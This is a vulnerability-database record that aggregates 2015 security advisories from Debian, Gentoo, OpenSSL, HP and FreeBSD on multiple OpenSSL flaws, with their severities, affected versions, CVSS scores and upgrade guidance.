        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2105"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-90924"
      },
      {
        "db": "BID",
        "id": "89757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "db": "PACKETSTORM",
        "id": "139167"
      },
      {
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2105"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-05-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-90924"
      },
      {
        "date": "2016-05-03T00:00:00",
        "db": "BID",
        "id": "89757"
      },
      {
        "date": "2016-05-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "date": "2016-05-10T17:01:56",
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "date": "2016-10-18T13:58:46",
        "db": "PACKETSTORM",
        "id": "139167"
      },
      {
        "date": "2016-07-19T19:45:20",
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
        "date": "2016-10-12T23:44:55",
        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "date": "2016-05-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      },
      {
        "date": "2016-05-05T01:59:01.200000",
        "db": "NVD",
        "id": "CVE-2016-2105"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-12-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-90924"
      },
      {
        "date": "2017-05-02T01:10:00",
        "db": "BID",
        "id": "89757"
      },
      {
        "date": "2017-10-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "date": "2022-12-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      },
      {
        "date": "2023-11-07T02:30:55.583000",
        "db": "NVD",
        "id": "CVE-2016-2105"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL of  crypto/evp/encode.c of  EVP_EncodeUpdate Integer overflow vulnerability in functions",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      }
    ],
    "trust": 0.6
  }
}

VAR-201503-0052

Vulnerability from variot - Updated: 2024-07-23 20:49

Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import. Supplementary information : CWE Vulnerability type by CWE-416: Use-after-free ( Use of freed memory ) Has been identified. OpenSSL is prone to remote memory-corruption vulnerability. Note: This issue was previously discussed in BID 73196 (OpenSSL Multiple Unspecified Security Vulnerabilities) but has been given its own record to better document it. Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application using the vulnerable library. Failed exploit attempts will result in denial-of-service conditions. This update reverts the defective patch applied in that update causing these problems. Additionally a follow-up fix for CVE-2015-0209 is applied.

Multiple vulnerabilities have been discovered in OpenSSL, a Secure Sockets Layer toolkit. The Common Vulnerabilities and Exposures project identifies the following issues:

CVE-2015-0286

Stephen Henson discovered that the ASN1_TYPE_cmp() function
can be crashed, resulting in denial of service.

CVE-2015-0287

Emilia Kaesper discovered a memory corruption in ASN.1 parsing.

CVE-2015-0292

It was discovered that missing input sanitising in base64 decoding
might result in memory corruption.

CVE-2015-0209

It was discovered that a malformed EC private key might result in
memory corruption.

CVE-2015-0288

It was discovered that missing input sanitising in the
X509_to_X509_REQ() function might result in denial of service.

For the stable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u16. Please review the CVE identifiers and the upstream advisory referenced below for details:

RSA silently downgrades to EXPORT_RSA [Client] (Reclassified) (CVE-2015-0204)
Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)
ASN.1 structure reuse memory corruption (CVE-2015-0287)
X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)
PKCS7 NULL pointer dereferences (CVE-2015-0289)
Base64 decode (CVE-2015-0292)
DoS via reachable assert in SSLv2 servers (CVE-2015-0293)
Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)

The following issues affect OpenSSL 1.0.2 only which is not part of the supported Gentoo stable tree:

OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)
Multiblock corrupted pointer (CVE-2015-0290)
Segmentation fault in DTLSv1_listen (CVE-2015-0207)
Segmentation fault for invalid PSS parameters (CVE-2015-0208)
Empty CKE with client auth and DHE (CVE-2015-1787)
Handshake with unseeded PRNG (CVE-2015-0285)

Impact

A remote attacker can utilize multiple vectors to cause Denial of Service or Information Disclosure. Tools such as revdep-rebuild may assist in identifying some of these packages.

References

[ 1 ] CVE-2015-0204 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0204 [ 2 ] CVE-2015-0207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0207 [ 3 ] CVE-2015-0208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0208 [ 4 ] CVE-2015-0209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0209 [ 5 ] CVE-2015-0285 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0285 [ 6 ] CVE-2015-0287 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0287 [ 7 ] CVE-2015-0288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0288 [ 8 ] CVE-2015-0289 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0289 [ 9 ] CVE-2015-0290 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0290 [ 10 ] CVE-2015-0291 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0291 [ 11 ] CVE-2015-0292 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0292 [ 12 ] CVE-2015-0293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0293 [ 13 ] CVE-2015-1787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1787 [ 14 ] OpenSSL Security Advisory [19 Mar 2015] http://openssl.org/news/secadv_20150319.txt

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201503-11

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. OpenSSL Security Advisory [19 Mar 2015] =======================================

OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)

Severity: High

If a client connects to an OpenSSL 1.0.2 server and renegotiates with an invalid signature algorithms extension a NULL pointer dereference will occur. This can be exploited in a DoS attack against the server.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a.

This issue was was reported to OpenSSL on 26th February 2015 by David Ramos of Stanford University. The fix was developed by Stephen Henson and Matt Caswell of the OpenSSL development team.

Reclassified: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)

Severity: High

This security issue was previously announced by the OpenSSL project and classified as "low" severity. This severity rating has now been changed to "high".

This was classified low because it was originally thought that server RSA export ciphersuite support was rare: a client was only vulnerable to a MITM attack against a server which supports an RSA export ciphersuite. Recent studies have shown that RSA export ciphersuites support is far more common.

This issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team. It was previously announced in the OpenSSL security advisory on 8th January 2015.

Multiblock corrupted pointer (CVE-2015-0290)

Severity: Moderate

OpenSSL 1.0.2 introduced the "multiblock" performance improvement. This feature only applies on 64 bit x86 architecture platforms that support AES NI instructions. A defect in the implementation of "multiblock" can cause OpenSSL's internal write buffer to become incorrectly set to NULL when using non-blocking IO. Typically, when the user application is using a socket BIO for writing, this will only result in a failed connection. However if some other BIO is used then it is likely that a segmentation fault will be triggered, thus enabling a potential DoS attack.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a.

This issue was reported to OpenSSL on 13th February 2015 by Daniel Danner and Rainer Mueller. The fix was developed by Matt Caswell of the OpenSSL development team.

Segmentation fault in DTLSv1_listen (CVE-2015-0207)

Severity: Moderate

The DTLSv1_listen function is intended to be stateless and processes the initial ClientHello from many peers. It is common for user code to loop over the call to DTLSv1_listen until a valid ClientHello is received with an associated cookie. A defect in the implementation of DTLSv1_listen means that state is preserved in the SSL object from one invocation to the next that can lead to a segmentation fault. Errors processing the initial ClientHello can trigger this scenario. An example of such an error could be that a DTLS1.0 only client is attempting to connect to a DTLS1.2 only server.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2a.

This issue was reported to OpenSSL on 27th January 2015 by Per Allansson. The fix was developed by Matt Caswell of the OpenSSL development team.

Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)

Severity: Moderate

The function ASN1_TYPE_cmp will crash with an invalid read if an attempt is made to compare ASN.1 boolean types. Since ASN1_TYPE_cmp is used to check certificate signature algorithm consistency this can be used to crash any certificate verification operation and exploited in a DoS attack. Any application which performs certificate verification is vulnerable including OpenSSL clients and servers which enable client authentication.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered and fixed by Stephen Henson of the OpenSSL development team.

Segmentation fault for invalid PSS parameters (CVE-2015-0208)

Severity: Moderate

The signature verification routines will crash with a NULL pointer dereference if presented with an ASN.1 signature using the RSA PSS algorithm and invalid parameters. Since these routines are used to verify certificate signature algorithms this can be used to crash any certificate verification operation and exploited in a DoS attack. Any application which performs certificate verification is vulnerable including OpenSSL clients and servers which enable client authentication.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a

This issue was was reported to OpenSSL on 31st January 2015 by Brian Carpenter and a fix developed by Stephen Henson of the OpenSSL development team.

ASN.1 structure reuse memory corruption (CVE-2015-0287)

Severity: Moderate

Reusing a structure in ASN.1 parsing may allow an attacker to cause memory corruption via an invalid write. Such reuse is and has been strongly discouraged and is believed to be rare.

Applications that parse structures containing CHOICE or ANY DEFINED BY components may be affected. Certificate parsing (d2i_X509 and related functions) are however not affected. OpenSSL clients and servers are not affected.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered by Emilia Käsper and a fix developed by Stephen Henson of the OpenSSL development team.

PKCS7 NULL pointer dereferences (CVE-2015-0289)

Severity: Moderate

The PKCS#7 parsing code does not handle missing outer ContentInfo correctly. An attacker can craft malformed ASN.1-encoded PKCS#7 blobs with missing content and trigger a NULL pointer dereference on parsing.

Applications that verify PKCS#7 signatures, decrypt PKCS#7 data or otherwise parse PKCS#7 structures from untrusted sources are affected. OpenSSL clients and servers are not affected.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was reported to OpenSSL on February 16th 2015 by Michal Zalewski (Google) and a fix developed by Emilia Käsper of the OpenSSL development team.

Base64 decode (CVE-2015-0292)

Severity: Moderate

A vulnerability existed in previous versions of OpenSSL related to the processing of base64 encoded data. Any code path that reads base64 data from an untrusted source could be affected (such as the PEM processing routines). Maliciously crafted base 64 data could trigger a segmenation fault or memory corruption. This was addressed in previous versions of OpenSSL but has not been included in any security advisory until now.

This issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.1 users should upgrade to 1.0.1h. OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 0.9.8 users should upgrade to 0.9.8za.

The fix for this issue can be identified by commits d0666f289a (1.0.1), 84fe686173 (1.0.0) and 9febee0272 (0.9.8). This issue was originally reported by Robert Dugal and subsequently by David Ramos.

DoS via reachable assert in SSLv2 servers (CVE-2015-0293)

Severity: Moderate

A malicious client can trigger an OPENSSL_assert (i.e., an abort) in servers that both support SSLv2 and enable export cipher suites by sending a specially crafted SSLv2 CLIENT-MASTER-KEY message.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered by Sean Burford (Google) and Emilia Käsper (OpenSSL development team) in March 2015 and the fix was developed by Emilia Käsper.

Empty CKE with client auth and DHE (CVE-2015-1787)

Severity: Moderate

If client auth is used then a server can seg fault in the event of a DHE ciphersuite being selected and a zero length ClientKeyExchange message being sent by the client. This could be exploited in a DoS attack.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a.

This issue was discovered and the fix was developed by Matt Caswell of the OpenSSL development team.

Handshake with unseeded PRNG (CVE-2015-0285)

Severity: Low

Under certain conditions an OpenSSL 1.0.2 client can complete a handshake with an unseeded PRNG. The conditions are: - The client is on a platform where the PRNG has not been seeded automatically, and the user has not seeded manually - A protocol specific client method version has been used (i.e. not SSL_client_methodv23) - A ciphersuite is used that does not require additional random data from the PRNG beyond the initial ClientHello client random (e.g. PSK-RC4-SHA).

If the handshake succeeds then the client random that has been used will have been generated from a PRNG with insufficient entropy and therefore the output may be predictable.

For example using the following command with an unseeded openssl will succeed on an unpatched platform:

openssl s_client -psk 1a2b3c4d -tls1_2 -cipher PSK-RC4-SHA

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a.

This issue was discovered and the fix was developed by Matt Caswell of the OpenSSL development team.

Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)

Severity: Low

A malformed EC private key file consumed via the d2i_ECPrivateKey function could cause a use after free condition. This, in turn, could cause a double free in several private key parsing functions (such as d2i_PrivateKey or EVP_PKCS82PKEY) and could lead to a DoS attack or memory corruption for applications that receive EC private keys from untrusted sources. This scenario is considered rare.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered by the BoringSSL project and fixed in their commit 517073cd4b. The OpenSSL fix was developed by Matt Caswell of the OpenSSL development team.

X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)

Severity: Low

The function X509_to_X509_REQ will crash with a NULL pointer dereference if the certificate key is invalid. This function is rarely used in practice.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered by Brian Carpenter and a fix developed by Stephen Henson of the OpenSSL development team.

Note

References

URL for this Security Advisory: https://www.openssl.org/news/secadv_20150319.txt

Note: the online version of the advisory may be updated with additional details over time.

For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html

Release Date: 2015-08-24 Last Updated: 2015-08-24

Potential Security Impact: Remote unauthorized modification, unauthorized access, or unauthorized disclosure of information.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Matrix Operating Environment. The vulnerabilities could be exploited remotely resulting in unauthorized modification, unauthorized access, or unauthorized disclosure of information.

References:

CVE-2010-5107 CVE-2013-0248 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-1692 CVE-2014-3523 CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8142 CVE-2014-8275 CVE-2014-9427 CVE-2014-9652 CVE-2014-9653 CVE-2014-9705 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 CVE-2015-0207 CVE-2015-0208 CVE-2015-0209 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-0285 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0290 CVE-2015-0291 CVE-2015-0292 CVE-2015-0293 CVE-2015-1787 CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2015-2134 CVE-2015-2139 CVE-2015-2140 CVE-2015-2301 CVE-2015-2331 CVE-2015-2348 CVE-2015-2787 CVE-2015-3113 CVE-2015-5122 CVE-2015-5123 CVE-2015-5402 CVE-2015-5403 CVE-2015-5404 CVE-2015-5405 CVE-2015-5427 CVE-2015-5428 CVE-2015-5429 CVE-2015-5430 CVE-2015-5431 CVE-2015-5432 CVE-2015-5433

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Matrix Operating Environment impacted software components and versions:

HP Systems Insight Manager (SIM) prior to version 7.5.0 HP System Management Homepage (SMH) prior to version 7.5.0 HP Version Control Agent (VCA) prior to version 7.5.0 HP Version Control Repository Manager (VCRM) prior to version 7.5.0 HP Insight Orchestration prior to version 7.5.0 HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following software updates available to resolve the vulnerabilities in the impacted versions of HP Matrix Operating Environment

HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO from the following location:

http://www.hp.com/go/insightupdates

Choose the orange Select button. This presents the HP Insight Management Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from the Software specification list. Fill out the rest of the form and submit it.

HP has addressed these vulnerabilities for the affected software components bundled with the HP Matrix Operating Environment in the following HP Security Bulletins.

HP Matrix Operating Environment component HP Security Bulletin Number Security Bulletin Location

HP Systems Insight Manager (SIM) HPSBMU03394 HPSBMU03394 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744

HP System Management Homepage (SMH) HPSBMU03380 http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la ng=en-us&cc=

HP Version Control Agent (VCA) HPSBMU03397 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169

HP Version Control Repository Manager (VCRM) HPSBMU03396 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04765115

HP Virtual Connect Enterprise Manager (VCEM) SDK HPSBMU03413 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04774021

HISTORY Version:1 (rev.1) - 24 August 2015 Initial release

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

References:

CVE-2014-0118 - Remote Denial of Service (DoS) CVE-2014-0226 - Remote Denial of Service (DoS) CVE-2014-0231 - Remote Denial of Service (DoS) CVE-2014-3523 - Remote Denial of Service (DoS) CVE-2014-3569 - Remote Denial of Service (DoS) CVE-2014-3570 - Remote Disclosure of Information CVE-2014-3571 - Remote Denial of Service (DoS) CVE-2014-3572 - Remote Disclosure of Information CVE-2014-8142 - Remote Code Execution CVE-2014-8275 - Unauthorized Modification CVE-2014-9427 - Remote Disclosure of Information CVE-2014-9652 - Remote Denial of Service (DoS) CVE-2014-9653 - Remote Denial of Service (DoS) CVE-2014-9705 - Remote Code Execution CVE-2015-0204 - Remote Disclosure of Information CVE-2015-0205 - Remote Unauthorized Access CVE-2015-0206 - Remote Denial of Service (DoS) CVE-2015-0207 - Remote Denial of Service (DoS) CVE-2015-0208 - Remote Denial of Service (DoS) CVE-2015-0209 - Remote Denial of Service (DoS) CVE-2015-0231 - Remote Denial of Service (DoS) CVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code CVE-2015-0273 - Remote Execution of Arbitrary Code CVE-2015-0285 - Remote Disclosure of Information CVE-2015-0286 - Remote Denial of Service (DoS) CVE-2015-0287 - Remote Denial of Service (DoS) CVE-2015-0288 - Remote Denial of Service (DoS) CVE-2015-0289 - Remote Denial of Service (DoS) CVE-2015-0290 - Remote Denial of Service (DoS) CVE-2015-0291 - Remote Denial of Service (DoS) CVE-2015-0292 - Remote Denial of Service (DoS) CVE-2015-0293 - Remote Denial of Service (DoS) CVE-2015-1787 - Remote Denial of Service (DoS) CVE-2015-2301 - Remote Execution of Arbitrary Code CVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code CVE-2015-2348 - Unauthorized Modification CVE-2015-2787 - Remote Execution of Arbitrary Code CVE-2015-2134 - Cross-site Request Forgery (CSRF) SSRT102109

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

============================================================================= FreeBSD-SA-15:06.openssl Security Advisory The FreeBSD Project

Topic: Multiple OpenSSL vulnerabilities

Category: contrib Module: openssl Announced: 2015-03-19 Affects: All supported versions of FreeBSD. Corrected: 2015-03-19 17:40:43 UTC (stable/10, 10.1-STABLE) 2015-03-19 17:42:38 UTC (releng/10.1, 10.1-RELEASE-p7) 2015-03-19 17:40:43 UTC (stable/9, 9.3-STABLE) 2015-03-19 17:42:38 UTC (releng/9.3, 9.3-RELEASE-p11) 2015-03-19 17:40:43 UTC (stable/8, 8.4-STABLE) 2015-03-19 17:42:38 UTC (releng/8.4, 8.4-RELEASE-p25) CVE Name: CVE-2015-0209, CVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0293

